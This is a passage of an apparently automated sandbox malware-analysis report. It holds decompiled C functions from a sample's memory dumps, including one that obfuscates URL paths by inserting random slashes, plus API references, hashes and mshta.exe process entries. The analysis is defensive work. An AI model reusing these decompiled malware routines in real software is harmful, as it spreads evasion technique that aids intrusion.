                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeSleepStringlstrlenmemcpy
                            • String ID:
                            • API String ID: 1198164300-0
                            • Opcode ID: 976124cc0b3647c4042bce58b58c637cb05fb462289adffb4fd6370ca7a8c08c
                            • Instruction ID: 0d6ea369a22e2b18947ba19e96ff386eaa7630a56084454a52d1379ea65eea49
                            • Opcode Fuzzy Hash: 976124cc0b3647c4042bce58b58c637cb05fb462289adffb4fd6370ca7a8c08c
                            • Instruction Fuzzy Hash: 30215675D00209EFCB10EFA8D8889DEBBB9FF49311B248169E945E7210E774DA41DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1484D, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00F1484D(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xf1d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xf1d288; // 0xa25004d8
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xf1d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                            0x00f14855
                            0x00f14858
                            0x00f1485e
                            0x00f14876
                            0x00f1487a
                            0x00f1487d
                            0x00f1487f
                            0x00f14882
                            0x00f14884
                            0x00f14887
                            0x00f14889
                            0x00f14889
                            0x00f1488b
                            0x00f14896
                            0x00f1489b
                            0x00f148ac
                            0x00f148b4
                            0x00f148b9
                            0x00f148bc
                            0x00f148bf
                            0x00f148c1
                            0x00f148c7
                            0x00f148ca
                            0x00f148ca
                            0x00f148ca
                            0x00f148d5
                            0x00f148da
                            0x00f148e4

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00F1A88E,00000000,?,75145520,00F164DC,?,057F95B0), ref: 00F14858
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00F14870
                            • memcpy.NTDLL(00000000,057F95B0,-00000008,?,?,?,00F1A88E,00000000,?,75145520,00F164DC,?,057F95B0), ref: 00F148B4
                            • memcpy.NTDLL(00000001,057F95B0,00000001,00F164DC,?,057F95B0), ref: 00F148D5
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 471cc006cd26d1451a54abc0891f6bd5fd5bb4b4b9f13a73a417f26060650360
                            • Instruction ID: b4de465732a5ea13f5498284b7543289a4e8207d262137dd86685a0af6f1dde5
                            • Opcode Fuzzy Hash: 471cc006cd26d1451a54abc0891f6bd5fd5bb4b4b9f13a73a417f26060650360
                            • Instruction Fuzzy Hash: C7112572A00158AFC7108BAAEC84DDEBFFEDBD4360B164176F504D7250EA749E44A7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15C2B, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F15C2B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xf1d2a4; // 0x2e8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xf1d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xf1d2a4; // 0x2e8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xf1d270; // 0x5400000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                            0x00f15c2b
                            0x00f15c32
                            0x00f15c7c
                            0x00f15c7e
                            0x00f15c7e
                            0x00f15c36
                            0x00f15c3c
                            0x00f15c41
                            0x00f15c45
                            0x00f15c4b
                            0x00f15c52
                            0x00000000
                            0x00000000
                            0x00f15c54
                            0x00f15c59
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f15c59
                            0x00f15c5b
                            0x00f15c63
                            0x00f15c66
                            0x00f15c66
                            0x00f15c6c
                            0x00f15c73
                            0x00f15c76
                            0x00f15c76
                            0x00000000

                            APIs
                            • SetEvent.KERNEL32(000002E8,00000001,00F14170), ref: 00F15C36
                            • SleepEx.KERNEL32(00000064,00000001), ref: 00F15C45
                            • CloseHandle.KERNEL32(000002E8), ref: 00F15C66
                            • HeapDestroy.KERNEL32(05400000), ref: 00F15C76
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseDestroyEventHandleHeapSleep
                            • String ID:
                            • API String ID: 4109453060-0
                            • Opcode ID: 0bb58a3f743a82068eb1e5483e9d97465cbff23ddca3070a6231549158b646f0
                            • Instruction ID: 69eeaee3c1685042379732398a34a01b0add75327eeef432186f9e4492c79329
                            • Opcode Fuzzy Hash: 0bb58a3f743a82068eb1e5483e9d97465cbff23ddca3070a6231549158b646f0
                            • Instruction Fuzzy Hash: 2FF01C71B40756DBD724AF74DD4CBC63BACAB48F617068514B915D7690CA30C941B9E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14D70, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00F14D70() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xf1d35c; // 0x57f95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xf1d35c; // 0x57f95b0
					if(_t5[0x16] == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xf1d35c; // 0x57f95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xf1e823) {
					HeapFree( *0xf1d270, 0, _t10);
					_t7 =  *0xf1d35c; // 0x57f95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                            0x00f14d70
                            0x00f14d79
                            0x00f14d89
                            0x00f14d89
                            0x00f14d93
                            0x00000000
                            0x00000000
                            0x00f14d83
                            0x00f14d83
                            0x00f14d95
                            0x00f14d9a
                            0x00f14d9e
                            0x00f14db1
                            0x00f14db7
                            0x00f14db7
                            0x00f14dc0
                            0x00f14dc2
                            0x00f14dc6
                            0x00f14dcc

                            APIs
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F14D79
                            • Sleep.KERNEL32(0000000A), ref: 00F14D83
                            • HeapFree.KERNEL32(00000000), ref: 00F14DB1
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F14DC6
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 65f37ea38158ca2b4e47c88627b40932a91560669c106493e7d80dad49035e9d
                            • Instruction ID: a3ee0ea350ef2178308d28b12783abb8d58520c2875163c46a3dcefbd42474b0
                            • Opcode Fuzzy Hash: 65f37ea38158ca2b4e47c88627b40932a91560669c106493e7d80dad49035e9d
                            • Instruction Fuzzy Hash: A2F0F878640249DFEB189B65EC59BE977B4AB49714B0BC119E902C7360C730EC44FE51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1282F, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E00F1282F(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00F155DC(_t2);
				if(_t34 != 0) {
					_t30 = E00F155DC(_t28);
					if(_t30 == 0) {
						E00F16DFA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00F1AAD2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00F1AAD2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                            0x00f1282f
                            0x00f12839
                            0x00f1283b
                            0x00f12841
                            0x00f12841
                            0x00f1284a
                            0x00f1284e
                            0x00f1285a
                            0x00f1285e
                            0x00f128d2
                            0x00f12860
                            0x00f12860
                            0x00f12864
                            0x00f1286b
                            0x00f1286e
                            0x00f12888
                            0x00f12877
                            0x00f12877
                            0x00f1287b
                            0x00f1287e
                            0x00f12883
                            0x00f12883
                            0x00f1288d
                            0x00f128b5
                            0x00f128bb
                            0x00f128be
                            0x00f1288f
                            0x00f12891
                            0x00f12899
                            0x00f128a4
                            0x00f128a9
                            0x00f128a9
                            0x00f128c5
                            0x00f128cc
                            0x00f128cd
                            0x00f128cd
                            0x00f1285e
                            0x00f128dd

                            APIs
                            • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00F156E4,00000000,00000000,?,057F9618,?,?,00F13B91,?,057F9618), ref: 00F1283B
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                              • Part of subcall function 00F1AAD2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00F12869,00000000,00000001,00000001,?,?,00F156E4,00000000,00000000,?,057F9618), ref: 00F1AAE0
                              • Part of subcall function 00F1AAD2: StrChrA.SHLWAPI(?,0000003F,?,?,00F156E4,00000000,00000000,?,057F9618,?,?,00F13B91,?,057F9618,0000EA60,?), ref: 00F1AAEA
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00F156E4,00000000,00000000,?,057F9618,?,?,00F13B91), ref: 00F12899
                            • lstrcpy.KERNEL32(00000000,?), ref: 00F128A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00F128B5
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: 6b0874b157fa219d27efc6f2e446f62d55e60733ccab1ab64c6a6d423241aede
                            • Instruction ID: 3f2f7f6a985f582bc480ca816722afe3bc5c7399627efe099e1bc02204734e70
                            • Opcode Fuzzy Hash: 6b0874b157fa219d27efc6f2e446f62d55e60733ccab1ab64c6a6d423241aede
                            • Instruction Fuzzy Hash: E521D272900259EFCB026FA4CC44AEE7FA9EF45360B158055FC099B201DB38CD94E7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15434, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F15434(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00F155DC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                            0x00f15449
                            0x00f1544d
                            0x00f15457
                            0x00f1545e
                            0x00f15461
                            0x00f15463
                            0x00f1546b
                            0x00f15470
                            0x00f1547e
                            0x00f15483
                            0x00f1548d

                            APIs
                            • lstrlenW.KERNEL32(?,?,75145520,00000008,057F93AC,?,00F14CD5,?,057F93AC,?,?,?,?,?,?,00F150D9), ref: 00F15444
                            • lstrlenW.KERNEL32(00F14CD5,?,00F14CD5,?,057F93AC,?,?,?,?,?,?,00F150D9), ref: 00F1544B
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • memcpy.NTDLL(00000000,?,751469A0,?,?,00F14CD5,?,057F93AC,?,?,?,?,?,?,00F150D9), ref: 00F1546B
                            • memcpy.NTDLL(751469A0,00F14CD5,00000002,00000000,?,751469A0,?,?,00F14CD5,?,057F93AC), ref: 00F1547E
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: lstrlenmemcpy$AllocateHeap
                            • String ID:
                            • API String ID: 2411391700-0
                            • Opcode ID: 156ccbd1a41cdb164d4919527080668a4e05b8ba11a21356f87194dcf39af4ee
                            • Instruction ID: f6965b1466e8d8484b56b105221cbb55d1da90cccff3e00c516848b8cf0ba0a4
                            • Opcode Fuzzy Hash: 156ccbd1a41cdb164d4919527080668a4e05b8ba11a21356f87194dcf39af4ee
                            • Instruction Fuzzy Hash: 7FF0EC76900118FB8B11EFA9CC45CDE7BADEF492647154062B904D7112E635EA549BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16F6D, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(057F9B58,00000000,00000000,?,00F16507,00000000), ref: 00F16F7D
                            • lstrlen.KERNEL32(?), ref: 00F16F85
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • lstrcpy.KERNEL32(00000000,057F9B58), ref: 00F16F99
                            • lstrcat.KERNEL32(00000000,?), ref: 00F16FA4
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 57c739673a057708ff26b3588b0db8df3b9dce1b0531965942c7e5a6db3a884b
                            • Instruction ID: c360f1229790389d9e73d583b903e795f0b8938384f70f3c8e8755e17ad47ee2
                            • Opcode Fuzzy Hash: 57c739673a057708ff26b3588b0db8df3b9dce1b0531965942c7e5a6db3a884b
                            • Instruction Fuzzy Hash: 4CE09273901629AB86119BE4AC48CDFBBADEF8D6213064416F600D3120C7248909ABE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: mshta.exe PID: 4036 Parent PID: 3472 mshta.exeCOMMON

                            Executed Functions

                            Function 0000016FB52B0FB9, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000015.00000003.381882541.0000016FB52B0000.00000010.00000001.sdmp, Offset: 0000016FB52B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 7ad26f74a82f6467cc1439eeaab4d924af8d9ffb660d0aec1dcb288eacb1507f
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 8890021859640A55D41A15915C8929C50406388250FD44594441690144D84E43971152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000016FB52B0FC1, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000015.00000003.381882541.0000016FB52B0000.00000010.00000001.sdmp, Offset: 0000016FB52B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 7ad26f74a82f6467cc1439eeaab4d924af8d9ffb660d0aec1dcb288eacb1507f
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 8890021859640A55D41A15915C8929C50406388250FD44594441690144D84E43971152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Analysis Process: mshta.exe PID: 1488 Parent PID: 3472 mshta.exeCOMMON

                            Executed Functions

                            Function 0000018A39B90FC1, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000016.00000003.382595885.0000018A39B90000.00000010.00000001.sdmp, Offset: 0000018A39B90000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: 98c16c77023d54fb21c31ae25183d19c3007d8208f876fa41224b0e53b21ea17
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: BA9002154A544666E41415910C4539C5040778E250FD884814816D0144D94D03965263
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000018A39B90FB9, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000016.00000003.382595885.0000018A39B90000.00000010.00000001.sdmp, Offset: 0000018A39B90000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: 98c16c77023d54fb21c31ae25183d19c3007d8208f876fa41224b0e53b21ea17
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: BA9002154A544666E41415910C4539C5040778E250FD884814816D0144D94D03965263
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Analysis Process: mshta.exe PID: 3696 Parent PID: 3472 mshta.exeCOMMON

                            Executed Functions

                            Function 000002BDF3C20FB9, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000017.00000003.382294090.000002BDF3C20000.00000010.00000001.sdmp, Offset: 000002BDF3C20000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 3b435a7f9153779b040b92df0c51ec4d6adfdbc3eb07541b0b7015aa64eacde9
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 6B90020C4D941656D41411910C492AC61406388360FDA8481881790944E54D42965152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000002BDF3C20FC1, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000017.00000003.382294090.000002BDF3C20000.00000010.00000001.sdmp, Offset: 000002BDF3C20000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 3b435a7f9153779b040b92df0c51ec4d6adfdbc3eb07541b0b7015aa64eacde9
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 6B90020C4D941656D41411910C492AC61406388360FDA8481881790944E54D42965152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Analysis Process: mshta.exe PID: 496 Parent PID: 3472 mshta.exeCOMMON

                            Executed Functions

                            Function 000001A8BC780FC1, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000003.398425500.000001A8BC780000.00000010.00000001.sdmp, Offset: 000001A8BC780000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: c5428663922cad8c1e0c73542435281898873ced1f7fdccdd5d9321f5650e4d5
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: FC90025459640655D41411970D492AC5050678D250FD48480891690145D84D02971167
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001A8BC780FB9, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000003.398425500.000001A8BC780000.00000010.00000001.sdmp, Offset: 000001A8BC780000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: c5428663922cad8c1e0c73542435281898873ced1f7fdccdd5d9321f5650e4d5
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: FC90025459640655D41411970D492AC5050678D250FD48480891690145D84D02971167
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions